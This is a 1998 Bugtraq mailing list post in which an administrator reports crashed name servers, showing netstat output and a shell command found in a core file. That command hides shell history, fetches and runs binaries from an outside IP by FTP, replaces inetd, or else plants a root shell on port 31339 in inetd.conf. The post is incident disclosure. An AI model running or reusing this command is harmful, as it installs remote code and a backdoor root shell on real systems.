Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Yipes named attack

From: nobody () ANON MYOFB ORG (Anonymous)
Date: Wed, 24 Jun 1998 16:20:01 -0400

All my name servers cored

connections looked like thislocalhost.36486      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36486       8192      0 32768      0 ESTABLISHED
localhost.36489      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36489       8192      0 32768      0 ESTABLISHED
localhost.36492      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36492       8192      0 32768      0 ESTABLISHED
localhost.36495      localhost.36494      32768      0  8192      0 ESTABLISHED
localhost.36494      localhost.36495       8192      0 32768      0 ESTABLISHED
localhost.36498      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36498       8192      0 32768      0 ESTABLISHED
localhost.36501      localhost.36500      32768      0  8192      0 ESTABLISHED
localhost.36500      localhost.36501       8192      0 32768      0 ESTABLISHED
localhost.36516      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36516       8192      0 32768      0 ESTABLISHED
localhost.36519      localhost.36518      32768      0  8192      0 ESTABLISHED
localhost.36518      localhost.36519       8192      0 32768      0 ESTABLISHED



this is in the core file


/bin/bash
export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec
ho -e 'open 208.21.174.3\nuser ftp h@e.y\nbin\nget i\nget d\nbye'|ftp -vin;if [
-f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo
t /bin/bash sh -i'>/etc/inetd.conf;fi;fie



Sun tells me to appl the latest patch
but 7 phone calls later can't tell me if
the patch addresses this hack.

=;{>
Previous By Date Next
Previous By Thread Next

Current thread: